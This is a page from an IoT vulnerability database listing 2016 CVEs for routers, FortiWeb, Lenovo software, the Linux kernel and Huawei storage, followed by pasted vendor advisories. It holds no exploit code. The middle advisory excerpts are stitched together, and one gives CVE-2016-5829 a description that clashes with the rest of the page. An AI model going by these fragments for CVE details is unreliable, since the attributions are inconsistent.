VARIoT IoT vulnerabilities database

VAR-201607-0312 CVE-2016-1228 Multiple Hikari Denwa routers vulnerable to cross-site request forgery
CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
Cross-site request forgery (CSRF) vulnerability on NTT EAST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1006 and earlier and NTT WEST Hikari Denwa routers with firmware PR-400MI, RT-400MI, and RV-440MI 07.00.1005 and earlier allows remote attackers to hijack the authentication of arbitrary users. Ryoya Tsukasaki of Urawa Commercial High School reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under the Information Security Early Warning Partnership. If a user views a malicious page while logged in, unintended operations may be performed. NTT Hikari Denwa PR-400MI, RV-440MI and RT-400MI are all router products of Japan Telecom Telephone (NTT). An attacker could exploit the vulnerability to perform unauthorized actions. This may aid in other attacks. The following products and versions are affected: NTT Hikari Denwa PR-400MI, RV-440MI and RT-400MI using firmware version 07.00.1006 and earlier; Hikari Denwa PR-400MI, RV-440MI and RT-400MI using firmware version 07.00.1005 and earlier.
VAR-201607-0016 CVE-2016-4066 Fortinet FortiWeb vulnerable to cross-site request forgery
CVSS V2: 6.8
CVSS V3: 8.8
Severity: HIGH
Cross-site request forgery (CSRF) vulnerability in Fortinet FortiWeb before 5.5.3 allows remote attackers to hijack the authentication of administrators for requests that change the password via unspecified vectors. Fortinet FortiWeb is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests. Exploiting this issue may allow a remote attacker to perform certain unauthorized actions. This may lead to further attacks. Versions of Fortinet FortiWeb prior to 5.5.3 are vulnerable. Fortinet FortiWeb is a web application layer firewall developed by Fortinet, which can block threats such as cross-site scripting, SQL injection, cookie poisoning, schema poisoning, etc., to ensure the security of web applications and protect sensitive database content.
VAR-201606-0144 CVE-2016-5249 Lenovo Solution Center vulnerability allowing arbitrary code execution with LocalSystem privileges
CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
Lenovo Solution Center (LSC) before 3.3.003 allows local users to execute arbitrary code with LocalSystem privileges via vectors involving the LSC.Services.SystemService StartProxy command with a named pipe created in advance and a crafted .NET assembly. Lenovo Solution Center is prone to local privilege-escalation and arbitrary code-execution vulnerabilities. Lenovo Solution Center 3.3.002 and prior versions are vulnerable. Lenovo Solution Center (LSC) is a set of software developed by China Lenovo (Lenovo) to help users quickly identify system health status, network connection and overall system security status. Arbitrary code execution vulnerabilities exist in versions prior to LSC 3.3.003.
VAR-201606-0143 CVE-2016-5248 Lenovo Solution Center LSC.Services.SystemService StopProxy command arbitrary process termination vulnerability
CVSS V2: 2.1
CVSS V3: 5.5
Severity: MEDIUM
The StopProxy command in LSC.Services.SystemService in Lenovo Solution Center before 3.3.003 allows local users to terminate arbitrary processes via the PID argument. A local attacker can exploit this issue to execute arbitrary code with LocalSystem account privileges. Lenovo Solution Center 3.3.002 and prior versions are vulnerable. Lenovo Solution Center (LSC) is a set of software developed by China Lenovo (Lenovo) to help users quickly identify system health status, network connection and overall system security status. A local privilege escalation vulnerability exists in the StopProxy command in LSC.Services.SystemService of versions prior to LSC 3.3.003.
VAR-201606-0329 CVE-2016-5829 Linux kernel Heap-based buffer error vulnerability

Related entries in the VARIoT exploits database: VAR-E-201606-0458
CVSS V2: 7.2
CVSS V3: 7.8
Severity: HIGH
Multiple heap-based buffer overflows in the hiddev_ioctl_usage function in drivers/hid/usbhid/hiddev.c in the Linux kernel through 4.6.3 allow local users to cause a denial of service or possibly have unspecified other impact via a crafted (1) HIDIOCGUSAGES or (2) HIDIOCSUSAGES ioctl call. The Linux kernel is prone to a local heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Local attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely crash the kernel, denying service to legitimate users.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update
Advisory ID: RHSA-2016:2006-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2016-2006.html
Issue date: 2016-10-04
CVE Names: CVE-2016-4470 CVE-2016-5829
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 6.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* A flaw was found in the Linux kernel's keyring handling code, where in key_reject_and_link() an uninitialized variable would eventually lead to an arbitrary free address, which could allow an attacker to use a use-after-free style attack. (CVE-2016-4470, Important)

* A heap-based buffer overflow vulnerability was found in the Linux kernel's hiddev driver. This flaw could allow a local attacker to corrupt kernel memory, possibly escalate privileges or crash the system. (CVE-2016-5829, Moderate)

The CVE-2016-4470 issue was discovered by David Howells (Red Hat Inc.).

Bug Fix(es):

* Previously, when two NFS shares with different security settings were mounted, the I/O operations to the kerberos-authenticated mount caused the RPC_CRED_KEY_EXPIRE_SOON parameter to be set, but the parameter was not unset when performing the I/O operations on the sec=sys mount. Consequently, writes to both NFS shares had the same parameters, regardless of their security settings. This update fixes this problem by moving the NO_CRKEY_TIMEOUT parameter to the auth->au_flags field. As a result, NFS shares with different security settings are now handled as expected. (BZ#1366962)

* In some circumstances, resetting a Fibre Channel over Ethernet (FCoE) interface could lead to a kernel panic, due to invalid information extracted from the FCoE header. This update adds sanity checking to the cpu number extracted from the FCoE header. This ensures that subsequent operations address a valid cpu, and eliminates the kernel panic. (BZ#1359036)

* Prior to this update, the following problems occurred with the way GFS2 transitioned files and directories from the "unlinked" state to the "free" state: The numbers reported for the df and the du commands in some cases got out of sync, which caused blocks in the file system to appear missing. The blocks were not actually missing, but they were left in the "unlinked" state. In some circumstances, GFS2 referenced a cluster lock that was already deleted, which led to a kernel panic. If an object was deleted and its space reused as a different object, GFS2 sometimes deleted the existing one, which caused file system corruption. With this update, the transition from "unlinked" to "free" state has been fixed. As a result, none of these three problems occur anymore. (BZ#1359037)

* Previously, the GFS2 file system in some cases became unresponsive due to lock dependency problems between inodes and the cluster lock. This occurred most frequently on nearly full file systems where files and directories were being deleted and recreated at the same block location at the same time. With this update, a set of patches has been applied to fix these lock dependencies. As a result, GFS2 no longer hangs in the described circumstances. (BZ#1359038)

* When used with controllers that do not support DCMD- MR_DCMD_PD_LIST_QUERY, the megaraid_sas driver can go into an infinite loop of error reporting messages. This could cause difficulties with finding other important log messages, or it could even cause the disk to overflow. This bug has been fixed by ignoring the DCMD MR_DCMD_PD_LIST_QUERY query for controllers which do not support it and sending the DCMD SUCCESS status to the AEN functions. As a result, the error messages no longer appear when there is a change in the status of one of the arrays. (BZ#1359039)

4. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

1341716 - CVE-2016-4470 kernel: Uninitialized variable in request_key handling causes kernel crash in error handling path
1350509 - CVE-2016-5829 kernel: Heap buffer overflow in hiddev driver

6. Package List:

Red Hat Enterprise Linux Desktop (v. 6):
Source: kernel-2.6.32-642.6.1.el6.src.rpm
i386: kernel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-devel-2.6.32-642.6.1.el6.i686.rpm kernel-headers-2.6.32-642.6.1.el6.i686.rpm perf-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm
noarch: kernel-abi-whitelists-2.6.32-642.6.1.el6.noarch.rpm kernel-doc-2.6.32-642.6.1.el6.noarch.rpm kernel-firmware-2.6.32-642.6.1.el6.noarch.rpm
x86_64: kernel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm kernel-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-headers-2.6.32-642.6.1.el6.x86_64.rpm perf-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm
x86_64: kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):
Source: kernel-2.6.32-642.6.1.el6.src.rpm
noarch: kernel-abi-whitelists-2.6.32-642.6.1.el6.noarch.rpm kernel-doc-2.6.32-642.6.1.el6.noarch.rpm kernel-firmware-2.6.32-642.6.1.el6.noarch.rpm
x86_64: kernel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm kernel-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-headers-2.6.32-642.6.1.el6.x86_64.rpm perf-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):
Source: kernel-2.6.32-642.6.1.el6.src.rpm
i386: kernel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-devel-2.6.32-642.6.1.el6.i686.rpm kernel-headers-2.6.32-642.6.1.el6.i686.rpm perf-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm
noarch: kernel-abi-whitelists-2.6.32-642.6.1.el6.noarch.rpm kernel-doc-2.6.32-642.6.1.el6.noarch.rpm kernel-firmware-2.6.32-642.6.1.el6.noarch.rpm
ppc64: kernel-2.6.32-642.6.1.el6.ppc64.rpm kernel-bootwrapper-2.6.32-642.6.1.el6.ppc64.rpm kernel-debug-2.6.32-642.6.1.el6.ppc64.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm kernel-debug-devel-2.6.32-642.6.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-642.6.1.el6.ppc64.rpm kernel-devel-2.6.32-642.6.1.el6.ppc64.rpm kernel-headers-2.6.32-642.6.1.el6.ppc64.rpm perf-2.6.32-642.6.1.el6.ppc64.rpm perf-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm
s390x: kernel-2.6.32-642.6.1.el6.s390x.rpm kernel-debug-2.6.32-642.6.1.el6.s390x.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.s390x.rpm kernel-debug-devel-2.6.32-642.6.1.el6.s390x.rpm kernel-debuginfo-2.6.32-642.6.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-642.6.1.el6.s390x.rpm kernel-devel-2.6.32-642.6.1.el6.s390x.rpm kernel-headers-2.6.32-642.6.1.el6.s390x.rpm kernel-kdump-2.6.32-642.6.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-642.6.1.el6.s390x.rpm kernel-kdump-devel-2.6.32-642.6.1.el6.s390x.rpm perf-2.6.32-642.6.1.el6.s390x.rpm perf-debuginfo-2.6.32-642.6.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.s390x.rpm
x86_64: kernel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm kernel-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-headers-2.6.32-642.6.1.el6.x86_64.rpm perf-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):
i386: kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm
ppc64: kernel-debug-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm kernel-debuginfo-common-ppc64-2.6.32-642.6.1.el6.ppc64.rpm perf-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm python-perf-2.6.32-642.6.1.el6.ppc64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.ppc64.rpm
s390x: kernel-debug-debuginfo-2.6.32-642.6.1.el6.s390x.rpm kernel-debuginfo-2.6.32-642.6.1.el6.s390x.rpm kernel-debuginfo-common-s390x-2.6.32-642.6.1.el6.s390x.rpm kernel-kdump-debuginfo-2.6.32-642.6.1.el6.s390x.rpm perf-debuginfo-2.6.32-642.6.1.el6.s390x.rpm python-perf-2.6.32-642.6.1.el6.s390x.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.s390x.rpm
x86_64: kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):
Source: kernel-2.6.32-642.6.1.el6.src.rpm
i386: kernel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-devel-2.6.32-642.6.1.el6.i686.rpm kernel-headers-2.6.32-642.6.1.el6.i686.rpm perf-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm
noarch: kernel-abi-whitelists-2.6.32-642.6.1.el6.noarch.rpm kernel-doc-2.6.32-642.6.1.el6.noarch.rpm kernel-firmware-2.6.32-642.6.1.el6.noarch.rpm
x86_64: kernel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debug-devel-2.6.32-642.6.1.el6.i686.rpm kernel-debug-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm kernel-devel-2.6.32-642.6.1.el6.x86_64.rpm kernel-headers-2.6.32-642.6.1.el6.x86_64.rpm perf-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: kernel-debug-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-2.6.32-642.6.1.el6.i686.rpm kernel-debuginfo-common-i686-2.6.32-642.6.1.el6.i686.rpm perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm python-perf-2.6.32-642.6.1.el6.i686.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.i686.rpm
x86_64: kernel-debug-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm kernel-debuginfo-common-x86_64-2.6.32-642.6.1.el6.x86_64.rpm perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm python-perf-2.6.32-642.6.1.el6.x86_64.rpm python-perf-debuginfo-2.6.32-642.6.1.el6.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2016-4470
https://access.redhat.com/security/cve/CVE-2016-5829
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2016 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFX9CKhXlSAg2UNWIIRAtDIAJ4jq1XKyOvhk936eIn8YqaTfkJ9PQCdEyBk
pvpRQNlcn7vpNO2lmcMjswg=
=1otA
-----END PGP SIGNATURE-----

--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce

7) - noarch, x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.

A local user could exploit this flaw to gain access to any file by setting an ACL. (CVE-2016-1237)

Kangjie Lu discovered an information leak in the Reliable Datagram Sockets (RDS) implementation in the Linux kernel. (CVE-2016-5244)

James Patrick-Evans discovered that the airspy USB device driver in the Linux kernel did not properly handle certain error conditions. (CVE-2016-5400)

Yue Cao et al discovered a flaw in the TCP implementation's handling of challenge acks in the Linux kernel. A remote attacker could use this to cause a denial of service (reset connection) or inject content into a TCP stream. (CVE-2016-5696)

Pengfei Wang discovered a race condition in the MIC VOP driver in the Linux kernel. (CVE-2016-5728)

Cyril Bur discovered that on PowerPC platforms, the Linux kernel mishandled transactional memory state on exec(). (CVE-2016-5829)

It was discovered that the OverlayFS implementation in the Linux kernel did not properly verify dentry state before proceeding with unlink and rename operations. (CVE-2016-6197)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 16.04 LTS:
linux-image-4.4.0-36-generic 4.4.0-36.55
linux-image-4.4.0-36-generic-lpae 4.4.0-36.55
linux-image-4.4.0-36-lowlatency 4.4.0-36.55
linux-image-4.4.0-36-powerpc-e500mc 4.4.0-36.55
linux-image-4.4.0-36-powerpc-smp 4.4.0-36.55
linux-image-4.4.0-36-powerpc64-emb 4.4.0-36.55
linux-image-4.4.0-36-powerpc64-smp 4.4.0-36.55

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

CVE-2016-6130
Pengfei Wang discovered a flaw in the S/390 character device drivers potentially leading to information leak with /dev/sclp.

For the stable distribution (jessie), these problems have been fixed in version 3.16.7-ckt25-2+deb8u3.

Security Fix(es):

* It was found that the Linux kernel's IPv6 implementation mishandled socket options. A local attacker could abuse concurrent access to the socket options to escalate their privileges, or cause a denial of service (use-after-free and system crash) via a crafted sendmsg system call.

Space precludes documenting each of these issues in this advisory. Refer to the CVE links in the References section for a description of each of these vulnerabilities. (CVE-2013-4312, CVE-2015-8374, CVE-2015-8543, CVE-2015-8812, CVE-2015-8844, CVE-2015-8845, CVE-2016-2053, CVE-2016-2069, CVE-2016-2847, CVE-2016-3156, CVE-2016-4581, CVE-2016-4794, CVE-2016-5412, CVE-2016-5828, CVE-2016-5829, CVE-2016-6136, CVE-2016-6198, CVE-2016-6327, CVE-2016-6480, CVE-2015-8746, CVE-2015-8956, CVE-2016-2117, CVE-2016-2384, CVE-2016-3070, CVE-2016-3699, CVE-2016-4569, CVE-2016-4578)

Red Hat would like to thank Philip Pettersson (Samsung) for reporting CVE-2016-2053; Tetsuo Handa for reporting CVE-2016-2847; the Virtuozzo kernel team and Solar Designer (Openwall) for reporting CVE-2016-3156; Justin Yackoski (Cryptonite) for reporting CVE-2016-2117; and Linn Crosetto (HP) for reporting CVE-2016-3699.

Additional Changes:

For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.

Bugs fixed (https://bugzilla.redhat.com/):

1141249 - Xen guests may hang after migration or suspend/resume
1234586 - Backtrace after unclean shutdown with XFS v5 and project quotas
1267042 - XFS needs to better handle EIO and ENOSPC
1277863 - Test case failure: Screen - Resolution after no Screen Boot on Intel Valley View Gen7 [8086:0f31]
1278224 - panic in iscsi_target.c
1283341 - cannot mount RHEL7 NFS server with nfsvers=4.1,sec=krb5 but nfsvers=4.0,sec=krb5 works
1286261 - CVE-2015-8374 kernel: Information leak when truncating of compressed/inlined extents on BTRFS
1286500 - Tool thin_dump failing to show 'mappings'
1290475 - CVE-2015-8543 kernel: IPv6 connect causes DoS via NULL pointer dereference
1292481 - device mapper hung tasks on an openshift/docker system
1295802 - CVE-2015-8746 kernel: when NFSv4 migration is executed, kernel oops occurs at NFS client
1297813 - CVE-2013-4312 kernel: File descriptors passed over unix sockets are not properly accounted
1299662 - VFIO: include no-IOMMU mode - not supported
1300023 - soft lockup in nfs4_put_stid with 3.10.0-327.4.4.el7
1300237 - CVE-2016-2053 kernel: Kernel panic and system lockup by triggering BUG_ON() in public_key_verify_signature()
1301893 - CVE-2016-2069 kernel: race condition in the TLB flush logic
1302166 - MAC address of VF is not editable even when attached to host
1303532 - CVE-2015-8812 kernel: CXGB3: Logic bug in return code handling prematurely frees key structures causing Use after free or kernel panic.
1305118 - XFS support for deferred dio completion
1307091 - fstrim failing on mdadm raid 5 device
1308444 - CVE-2016-2384 kernel: double-free in usb-audio triggered by invalid USB descriptor
1308846 - CVE-2016-3070 kernel: Null pointer dereference in trace_writeback_dirty_page()
1312298 - CVE-2016-2117 kernel: Kernel memory leakage to ethernet frames due to buffer overflow in ethernet drivers
1313428 - CVE-2016-2847 kernel: pipe: limit the per-user amount of pages allocated in pipes
1318172 - CVE-2016-3156 kernel: ipv4: denial of service when destroying a network interface
1321096 - BUG: s390 socketcall() syscalls audited with wrong value in field a0
1326540 - CVE-2015-8845 CVE-2015-8844 kernel: incorrect restoration of machine specific registers from userspace
1329653 - CVE-2016-3699 kernel: ACPI table override allowed when securelevel is enabled
1333712 - CVE-2016-4581 kernel: Slave being first propagated copy causes oops in propagate_mnt
1334643 - CVE-2016-4569 kernel: Information leak in Linux sound module in timer.c
1335215 - CVE-2016-4578 kernel: Information leak in events in timer.c
1335889 - CVE-2016-4794 kernel: Use after free in array_map_alloc
1349539 - T460[p/s] audio output on dock won't work
1349916 - CVE-2016-5412 Kernel: powerpc: kvm: Infinite loop via H_CEDE hypercall when running under hypervisor-mode
1349917 - CVE-2016-5828 Kernel: powerpc: tm: crash via exec system call on PPC
1350509 - CVE-2016-5829 kernel: Heap buffer overflow in hiddev driver
1353533 - CVE-2016-6136 kernel: Race condition vulnerability in execve argv arguments
1354525 - CVE-2016-6327 kernel: infiniband: Kernel crash by sending ABORT_TASK command
1355654 - CVE-2016-6198 kernel: vfs: missing detection of hardlinks in vfs_rename() on overlayfs
1361245 - [Hyper-V][RHEL 7.2] VMs panic when configured with Dynamic Memory as opposed to Static Memory
1362466 - CVE-2016-6480 kernel: scsi: aacraid: double fetch in ioctl_send_fib()
1364971 - CVE-2016-3841 kernel: use-after-free via crafted IPV6 sendmsg for raw / tcp / udp / l2tp sockets.
1383395 - CVE-2015-8956 kernel: NULL dereference in RFCOMM bind callback
VAR-201606-0055 CVE-2016-5722 OceanStor vulnerable to replay attacks
CVSS V2: 7.5
CVSS V3: 7.3
Severity: HIGH
Huawei OceanStor 5300 V3, 5500 V3, 5600 V3, 5800 V3, 6800 V3, 18800 V3, and 18500 V3 before V300R003C10 sends the plaintext session token in the HTTP header, which allows remote attackers to conduct replay attacks and obtain sensitive information by sniffing the network. Because OceanStor sends the session token in clear text in the HTTP header, a replay attack can be carried out and important information obtained. A third party intercepting the network may carry out a replay attack and obtain important information. Huawei OceanStor 5300 and the other listed storage products are all products of Huawei. A security vulnerability exists in several Huawei OceanStor products. The vulnerability stems from the fact that the program sends a clear text session token in the HTTP header. A remote attacker can exploit the vulnerability by sniffing the network to carry out replay attacks and obtain sensitive information. This may lead to other attacks. The following products and versions are affected: Huawei OceanStor 5300 V3, 5500 V3, 5600 V3, 5800 V3, 6800 V3, 18800 V3, and 18500 V3 versions earlier than V300R003C10.
VAR-201606-0515 No CVE ASUS DSL-N55U Router Information Disclosure Vulnerability
CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
ASUS DSL-N55U is a dual-band wireless router product from ASUS. Cross-site scripting vulnerabilities and information disclosure vulnerabilities exist in ASUS DSL-N55U Router 3.0.0.4.376_2736. These vulnerabilities originate from programs that do not properly filter input submitted by users. When a user browses an affected website, their browser executes arbitrary script code provided by the attacker. This could lead to attackers stealing cookie-based authentication credentials and gaining sensitive information. ASUS DSL-N55U 3.0.0.4.376_2736 is vulnerable.
VAR-201607-0459 CVE-2016-5821 Huawei HiSuite vulnerability allowing local users to gain SYSTEM privileges
CVSS V2: 7.2
